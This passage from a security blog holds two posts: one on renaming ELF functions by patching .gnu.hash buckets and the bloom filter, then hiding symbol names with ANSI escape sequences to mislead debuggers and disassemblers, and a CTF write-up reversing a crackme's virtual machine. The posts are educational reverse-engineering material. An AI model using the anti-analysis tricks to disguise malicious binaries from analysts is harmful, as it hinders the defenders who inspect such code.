 Hash 8 : 0xeefd3ea  | 0xead3ef0eL
 Hash 9 : 0x7997ef59  | 0x59ef9779
mitsurugi@raspi:~/resolv_func/blog$

4/1/ First speedup: Hash table.

For quickly find object in a list, use hashtable. Hashtable are a convenient way to sort and find items in a list. The hash function used in the resolver is the djbx33a one:

static uint_fast32_t
dl_new_hash (const char *s)
{
  uint_fast32_t h = 5381;
  for (unsigned char c = *s; c != '\0'; c = *++s)
    h = h * 33 + c;
  return h & 0xffffffff;
}

We can calculate easily the hash of our function:

mitsurugi@raspi:~/resolv_func/blog$ ./dl_new_hash.py this_is_an_external_func_in_a_lib
[+] Calculating hash for this_is_an_external_func_in_a_lib
Output is 0xCCEAA1DF
mitsurugi@raspi:~/resolv_func/blog$

We can find our hash in the .gnu.hash section: 0xcceaa1de (minus the lower bit, but it's nonsignificant when solver compares hashes, although I spent too much time on this detail).

So, if you change the name of the function and its associated hash, it should work? No, not so easily. This is an hash table, you have to get the same bucket. Long story short, your (new_hash % nbuckets) should be equal to (old_hash % nbuckets). nbuckets equals 3 in this library. Let's work with this number:

this_is_an_external_func_in_a_lib : hash(func)%3 = 0xCCEAA1DF%3 = 0
AAAA_is_an_external_func_in_a_lib : hash(func)%3 = 0xEEA9C6CB%3 = 1 -> Not the same bucket, won't work
BAAA_is_an_external_func_in_a_lib : hash(func)%3 = 0xFFE18ACC%3 = 0 -> Good.

So, we change name of the functions, and change hash with 0xFFE18ACC. Will it work? Still not, one last change to do.

4/2/ Second speedup added: Bloom filter

Using hashes is a big speedup, but libc maintenairs adds another big boost: bloom filter. The goal of this is to quickly reject unknown symbols. This bloom filter is made of another hash, and is used as a fast rejection process. If bloom filter fails, the symbol is not in the file. If bloom filter pass, it maybe or maybe not in the file. Apparently, this causes a huge speedup in symbol resolution. That's clever, but I have to change my fnction name.

If you want to bypass this bloom filter, you can recalculate it. Or you can put all bits to 1 which means: always pass. I'm not a programmer, I want things to work the way I want. So let put all bits to 1, and don't try to recalculate anything.

And after the bloom filter change, it will works, because the linker will say:

does it pass the bloom filter? Yes
does it have an hash? Yes
-n the hash bucket, does a function with the same name exists? Yes
--> Symbol resolution is done, code is here, work your way.

4/3/ First win:

We have to change function name: Easy, we use BAAA_is_an_external_func_in_a_lib
We have to break bloom filter: Easy, put all bits to 1
We have to change hash value: Easy, just take care of the bucket.

After an hexediting (All bytes have been changed by hand):

mitsurugi@raspi:~/resolv_func/blog$ readelf -x .gnu.hash libpoem.so

Hex dump of section '.gnu.hash':
  0x00000118 03000000 08000000 02000000 06000000 ................
  0x00000128 ffffffff ffffffff 08000000 0c000000 ................
  0x00000138 0f000000 00af34e8 4245d5ec cc8ae1ff ......4.BE......
  0x00000148 bbe3927c beda571b d871581c b98df10e ...|..W..qX.....
  0x00000158 76543c94 ead3ef0e 59ef9779          vT<.....Y..y

mitsurugi@raspi:~/resolv_func/blog$

Look bloom filter (all bits are 1), and hash change.
And now, it works like a charm!

mitsurugi@raspi:~/resolv_func/blog$ ./proj2
ARM disassembly
Reading symbol resolving
In the cold of night
mitsurugi@raspi:~/resolv_func/blog$ gdb -q proj2 
Reading symbols from proj2...(no debugging symbols found)...done.
gdb$ disass main
Dump of assembler code for function main:
   0x000006ac <+0>: push {r7, lr}
   0x000006ae <+2>: sub sp, #8
   0x000006b0 <+4>: add r7, sp, #0
   0x000006b2 <+6>: blx 0x584 <BAAA_is_an_external_func_in_a_lib@plt>
   0x000006b6 <+10>: str r0, [r7, #4]
   0x000006b8 <+12>: ldr r3, [r7, #4]
   0x000006ba <+14>: mov r0, r3
   0x000006bc <+16>: adds r7, #8
   0x000006be <+18>: mov sp, r7
   0x000006c0 <+20>: pop {r7, pc}
End of assembler dump.
gdb$

As you can see, I'm calling the function BAAA_is_an_external_func_in_a_lib(), and it works.

mitsurugi@raspi:~/resolv_func/blog$ strings proj2 libpoem.so | grep BAAA
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

We know how to change a function name inside a binary and its lib without breaking anything!

5/ Now the fun part!

Ok, let's write a quick python patcher, called, patch.py
You can use anything in the range \x01-\xff for function name. Changing a character in a function is not fun. We can be good boyz (or girlz) and use internationalization. Write UTF-8, and be happy with it. But do you know that your xterm interprets escape sequence? \e]34; will print everything in black. Let write black on black and confuse reversers.

5/1/ Fun with ANSI escape code

we can use a function containing ansi escape code. Ansi escape code can be used to send BEEP, blink characters, change xterm name, change colors, and so on. Here is the fun part, where we change the xterm title when printing the function:

Little known fact: An evil binary can rename your xterm while begin debugged. Blogpost incoming.
Hours of fun: disassembly printed black on black, different functions with same name, and so on. pic.twitter.com/xVTV1ojuWS
— Mitsurugi Heishiro (@0xmitsurugi) 16 février 2018

Fun, but can we do better? Ansi escape code can go backward.
So, we can overwrite function name:

Reading symbols from crack...(no debugging symbols found)...done.
(gdb) disass main
Dump of assembler code for function main:
   0x00000688 <+0>: push {r7, lr}
   0x0000068a <+2>: add r7, sp, #0
   0x0000068c <+4>: blx 0x53c <calling@plt>
   0x00000690 <+8>: movs r3, #0
   0x00000692 <+10>: mov r0, r3
   0x00000694 <+12>: pop {r7, pc}
End of assembler dump.
(gdb) q
mitsurugi@raspi:~/resolv_func/blog$

and, the library says:

mitsurugi@raspi:~/resolv_func/blog$ nm libcrack.so | grep ' T '
000004fc T calling
0000050a T calling
00000518 T calling
00000528 T _fini
000003fc T _init
mitsurugi@raspi:~/resolv_func/blog$

Three functions with the same name?!?! Which one is the good one? You can spend a lot of time in this crackme with static analysis only.

Those fuctions are different. Their name is A\x1b[1Dcalling, B\x1b[1Dcalling and C\x1b[1Dcalling. The \x1b[1D is the sequence backward of 1 char, so it overwrites the first char.

5/2/ Fun with IDA

You can play with IDA. IDA doesn't recognize characters and replace them with _. How in the world would you debug a binary
calling functions ____() and ____() and ____() which are different?
I think there is a lot of improvements here, I'll try to make another blogpost with funny sequences.

6/ The End

I think this blogpost is waaaaay too long, so I'll finish it here. Code will be posted to github, it's just a python script which patch address in binary.

Today not possible. Tomorrow possible.
0xMitsurugi

mardi 30 janvier 2018

Solving a CTF chall the [academic|hardest] way (FIC2018)

My previous articles on solving a crackme has gained some attention, so I'm doing the next one (and the last, I promise). This time, I'll explain how to solve a crackme based on a VM. There is a lot more of asm than previous solutions :-)

This is a more academic blogpost where I'll try to explain how to understand the logic behind the VM and the crackme.

1/ A bit of technic first.

Basically, when you implement a VM, you have to create a virtual CPU. This virtual CPU will have its own registers, memory, CPU flags. This virtual CPU will fetch, decode and execute instructions. Instructions are sequence of bits (for simplification, imagine a byte), and instructions can take 0 to N arguments.

if in pseudo code we want to make 13 xor 37, we can imagine this sequence instructions:

PUT 13 in register (say, R1)
PUT 37 in another register (say, R2)
XOR R1 with R2

this is just encoding after it. If PUT is encoding with a 0x42, register by their numbers, and XOR is encoded as a 0xff, the logical sequence will be:

0x42 0x13 0x1
0x42 0x37 0x2
0xff 0x1 0x2

Easy. That's just conventions. The program is: 0x421301423702ff0102

And the CPU will work with this . Instruction pointer is at offset 0x00.

Fetch: 0x42
Decode: that's a push. It takes 2 arguments: value, then register. Increase instruction pointer by 3..
Execute: moving value at (instruction pointer +1) to register (instruction pointer +2).

Fetch 0x42
and so on..

So if you want to break a VM, you have to learn where the instruction pointer is, where the registers are stored, and how to decode assembly. You have to figure out that 0x42 is a push in the previous example. How? That's the difficulty.

Now, back on our crackme. This is a VM. So, we have the program which emulate a CPU. So, we have to find a big loop: the fetch-decode-execute loop. Once found, you'll know where the instruction pointer is, and where are the instructions.

Next, you'll have to understand the instructions. Once done, this is even more easy: understand program logic, break it, solve the chall, gain points.

2/ Find where things takes place

take time to read the assembly, and follow the dots 1,2,3..

mitsurugi@dojo:~/chall/FIC2018/v24$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb$ disass main
Dump of assembler code for function main:
   0x0000000000400530 <+0>: push   %rbx
   0x0000000000400531 <+1>: mov    $0x1000,%edi
   0x0000000000400536 <+6>: callq  0x400510 <malloc@plt>
   0x000000000040053b <+11>: or     $0xffffffff,%edx
   0x000000000040053e <+14>: test   %rax,%rax
   0x0000000000400541 <+17>: mov    %rax,0x2023d0(%rip)        # 0x602918 <stack>
   0x0000000000400548 <+24>: je     0x40059a <main+106>

//Here is a big loop. The fetch-decode-execute one, probably.
//We read something at 0x602914 (regs+20)
1.   0x000000000040054a <+26>: movslq 0x2023c3(%rip),%rax        # 0x602914 <regs+20>
     0x0000000000400551 <+33>: cmpb   $0xee,0x601440(%rax)       //if equals to 0xee goto end
     0x0000000000400558 <+40>: je     0x40058c <main+92>
3.   0x000000000040055a <+42>: mov    $0x602800,%ebx             //ebx will get increments from 0x10 to 0x10
     0x000000000040055f <+47>: mov    (%rbx),%edx                
     0x0000000000400561 <+49>: movslq 0x2023ac(%rip),%rax        # 0x602914 <regs+20>
     0x0000000000400568 <+56>: test   %edx,%edx  
     0x000000000040056a <+58>: je     0x400582 <main+82>         
4.   0x000000000040056c <+60>: movzbl 0x601440(%rax),%eax        //we fetch the byte @0x601440+rax
     0x0000000000400573 <+67>: cmp    %edx,%eax                  //if eax==edx we call something. That's decode part.
     0x0000000000400575 <+69>: jne    0x40057c <main+76>
     0x0000000000400577 <+71>: xor    %eax,%eax
5.   0x0000000000400579 <+73>: callq  *0x8(%rbx)                 //the call. Probably the execute part.
     0x000000000040057c <+76>: add    $0x10,%rbx
     0x0000000000400580 <+80>: jmp    0x40055f <main+47>         
     0x0000000000400582 <+82>: inc    %eax                       
//The regs+20 gets increased one by one -> so we step in the VM code probably.
2.   0x0000000000400584 <+84>: mov    %eax,0x20238a(%rip)        # 0x602914 <regs+20> 
     0x000000000040058a <+90>: jmp    0x40054a <main+26>

//from here, this is the end of the program
   0x000000000040058c <+92>: mov    0x202385(%rip),%rdi        # 0x602918 <stack>
   0x0000000000400593 <+99>: callq  0x4004c0 <free@plt>
   0x0000000000400598 <+104>: xor    %edx,%edx
   0x000000000040059a <+106>: mov    %edx,%eax
   0x000000000040059c <+108>: pop    %rbx
   0x000000000040059d <+109>: retq   
End of assembler dump.
gdb$

We almost understand how this VM works.

The instruction pointer is at regs+20 (0x602914), we fetch the instruction at 0x601440+the value in regs+20.
The byte is read, then compared to something on 0x602800, 0x602810, 0x602820 and so on. We say this is the decode part.
Then, the callq rbx+0x8 is the execute part.

Fetch, decode, execute.

We know how the virtual CPU works. Lets dive into details. First, what do we have around the instruction pointer:

gdb$ x/16wx 0x601440
0x601440 <g_data>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601450 <g_data+16>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601460 <g_data+32>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601470 <g_data+48>: 0x00000000 0x00000000 0x00000000 0x00000000
gdb$

We have a lot of 00 (a NOP maybe?). What next?

gdb$ x/160wx 0x601440
0x601440 <g_data>: 0x00000000 0x00000000 0x00000000 0x00000000
 (snip ... snip ...snip)
0x601570 <g_data+304>: 0x00000000 0x0001e155 0x0c0d0300 0x0000e255
0x601580 <g_data+320>: 0x0cf20000 0x0000bb33 0xddf20000 0xcc1300bb
0x601590 <g_data+336>: 0x000000bb 0xbbdd0100 0xbbcc3700 0x00000000
0x6015a0 <g_data+352>: 0x00bbdd01 0x00bbccd3 0x01000000 0x3d00bbdd
0x6015b0 <g_data+368>: 0x0000bbcc 0xdd010000 0xccc000bb 0x000000bb
0x6015c0 <g_data+384>: 0xbbdd0100 0xbbccde00 0x00000000 0x00bbdd01
0x6015d0 <g_data+400>: 0x00bbccab 0x01000000 0xad00bbdd 0x0000bbcc
0x6015e0 <g_data+416>: 0xdd010000 0xcc1d00bb 0x000000bb 0xbbdd0100
0x6015f0 <g_data+432>: 0xbbccea00 0x00000000 0x00bbdd01 0x00bbcc13
0x601600 <g_data+448>: 0x01000000 0x3700bbdd 0x0000bbcc 0xaa010000
0x601610 <g_data+464>: 0x000000bb 0xbb33f200 0x00000001 0x02bbaa7a
0x601620 <g_data+480>: 0xf3000000 0x0003bb33 0x66600000 0x990100ab
0x601630 <g_data+496>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x601640 <g_data+512>: 0x000000bb 0xbb33f400 0x00000001 0x02bbaab2
0x601650 <g_data+528>: 0xf5000000 0x0003bb33 0x664e0000 0x990100ab
0x601660 <g_data+544>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x601670 <g_data+560>: 0x000000bb 0xbb33f600 0x00000001 0x02bbaab4
0x601680 <g_data+576>: 0xf7000000 0x0003bb33 0x66bb0000 0x990100ab
0x601690 <g_data+592>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x6016a0 <g_data+608>: 0x000000bb 0xbb33f800 0x00000001 0x02bbaae6
0x6016b0 <g_data+624>: 0xf9000000 0x0003bb33 0x66d40000 0x990100ab

The first non-zero byte is 0x55. This is probably the beginning of the code.
Now the decode part, if we look at what we have in 0x602800:

gdb$ x/20wx 0x602800
0x602800 <vm_func>: 0x00000011 0x00000000 0x00400696 0x00000000
0x602810 <vm_func+16>: 0x00000099 0x00000000 0x00400a40 0x00000000
0x602820 <vm_func+32>: 0x00000022 0x00000000 0x00400798 0x00000000
0x602830 <vm_func+48>: 0x00000033 0x00000000 0x00400697 0x00000000
0x602840 <vm_func+64>: 0x00000044 0x00000000 0x00400799 0x00000000
gdb$ x/x 0x00400696                  //What is there?
0x400696 <vm_ret>: 0x77058bc3   // oooh, the beginning of vm_ret :)
gdb$ x/x 0x00400a40
0x400a40 <vm_jnz>: 0x1ece058b   //and vm_jnz, and the others ^_^
gdb$

Ok. So the program reads a byte in the g_data part. Then it calls a function depending on this byte.

That's really, really a good point. We have a byte, and a function. Doesn't take long to understand that this the assembly:

0x11 is vm_ret RETURN
0x99 is vm_jnz JUMP if NON ZERO
0x22 is vm_cll CALL
0x33 is vm_mov MOVE
0x44 is vm_push PUSH
0x55 is vm_ecl ??
0x66 is vm_cmp COMPARE
0x77 is vm_jmp JUMP
0x88 is vm_jzz JUMP if ZERO
0xaa is vm_mvp ?? move? pointer maybe?
0xbb is vm_and AND
0xcc is vm_add ADD
0xdd is vm_xor XOR
0x00 is NOP (we guessed it)
0xee is END (we guessed it also)

Ladies and gentlemen, the asm of the VM.

3/ Let see what happens

So, the first byte is vm_ecl. In order to quickly run the binary, we break at 0x000000000040054a only if $rax!=0

gdb$ b * 0x0000000000400573 if $rax!=0
Breakpoint 3 at 0x400573
gdb$ c
Continuing.
gdb$ info reg rax
rax            0x55 0x55
gdb$ disass vm_ecl
Dump of assembler code for function vm_ecl:
   0x0000000000400d28 <+0>: mov    eax,DWORD PTR [rip+0x201be6]        # 0x602914 <regs+20>
   0x0000000000400d2e <+6>: lea    edx,[rax+0x1]
   0x0000000000400d31 <+9>: mov    DWORD PTR [rip+0x201bdd],edx        # 0x602914 <regs+20>
   0x0000000000400d37 <+15>: movsxd rdx,edx
   0x0000000000400d3a <+18>: mov    dl,BYTE PTR [rdx+0x601440]
   0x0000000000400d40 <+24>: cmp    dl,0xe1
   0x0000000000400d43 <+27>: je     0x400d6f <vm_ecl+71>
   0x0000000000400d45 <+29>: cmp    dl,0xe2
   0x0000000000400d48 <+32>: je     0x400de2 <vm_ecl+186>
   0x0000000000400d4e <+38>: cmp    dl,0xe0
   0x0000000000400d51 <+41>: jne    0x400e55 <vm_ecl+301>
(...)
   0x0000000000400d6a <+66>: call   0x400520 <exit@plt>
(...)
   0x0000000000400ddd <+181>: jmp    0x4004d0 <write@plt>
(...)
   0x0000000000400e50 <+296>: jmp    0x4004e0 <read@plt>

Well, a switch case. If next byte is 0xe1 0xe2 or 0xe0, this function behaves differently. We have read, write and exit function in it. That should be for input/output. Let's step over for the moment, and see what's happening:

gdb$ stepo
Temporary breakpoint 4 at 0x40057c
ENTER PASS :
gdb$

That's it. Let's go back to the VM disassembly a bit. We had:

0x601570 <g_data+304>: 0x00000000 0x0001e155 0x0c0d0300 0x0000e255
0x601580 <g_data+320>: 0x0cf20000 0x0000bb33 0xddf20000 0xcc1300bb

Put in right order: 55 e1 01 00 00 03 0d 0c 55 e2 00 00 f2 cf 33 bb... 55 is I/O, e1 seems to be output, numbers after are unknown (adress of the string probably), and next instructions should be 55 e2 (waiting for input). Let see the next instruction:

gdb$ info reg rax
rax            0x0c 0x0c
gdb$

Next instructions is 0x0c ?? As if the instruction pointer missed a step (?).
In our case, that's not really important because 0xc is not a valid instruction, so it will loop around all vm_functions, the iterate, then read 0x55. Let continue, stepover the vm_ecl function:

gdb$ stepo
Temporary breakpoint 5 at 0x40057c
ABCDEFABCDEF                       //entered myself
0x0000000000400580 in main ()
gdb$
gdb$ x/x 0x602914
0x602914 <regs+20>: 0x00000143    //offset of the instruction pointer
gdb$ x/wx 0x601440+0x143
0x601583 <g_data+323>: 0x00bb330c    //the instruction pointer
gdb$

and once again, the 0x0c invalid instruction. vm_ecl doesn't increment the instruction pointer to the next instruction. The VM is built on a way that it doesn't matter, as long as the instruction is invalid... This is kind of a bug!

Let's fast forward a bit, until a 0xdd instruction (XOR):

Now, a bit of refactoring, this is just the VM assembly extracted from g_data:
0xdd 0xbb 0x00 0x13 //vm_xor
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01 //vm_add
0xdd 0xbb 0x00 0x37 //vm_xor
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01 //vm_add
0xdd 0xbb 0x00 0xd3
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01
0xdd 0xbb 0x00 0x3d
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01
0xdd 0xbb 0x00 0xc0
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01

Seeing a pattern? 0xbb shoud be an offset to somewhere, XOR is the key, and we slide this offset one by one, in pseudo code, it becomes:

xor(pass[i], 0x13)
i = i+1
xor(pass[i], 0x37)
i = i+1
etc...

We extract the key: 0x1337d33dc0 just by reading the vm assembly.

And what about the instruction pointer? Does it point to the right instruction after a vm_xor?

gdb$ info reg rax
rax            0xcc 0xcc
gdb$

yep, it works, so the vm_xor instruction advance the instruction pointer right.

The next steps are to understand other vm_XXX instructions, where data is stored, what is done with it, and so on.

Just step through the function and mark all known addresses (base address, offsets, registers, CPU flags, and you'll quickly be able to reverse any VM code. Follow the vm_cmp instruction, learn where are the offsets, and compare yourself the bytes.

4/ Why the crackme accepts more than one solution?

As we saw, sometimes, the instruction pointer is not incremented to the next instruction. If the instruction is illegal, nothing happen. But if the instruction pointer falls on a known instruction, a different behavior is done.
0xF4b found that the vm_mov is also buggy, and an 0xbb instruction is called (vm_and) instead of the vm_cmp, and the JNZ is never called afterwards.

5/ Conclusion

Thank you for scrolling this far ;-) Learn to pwn crackme.
If you want the a.out file to play with it, drop me a DM or email.

Those who want to do will find a way.

Those who don't want to do search an excuse.

0xMitsurugi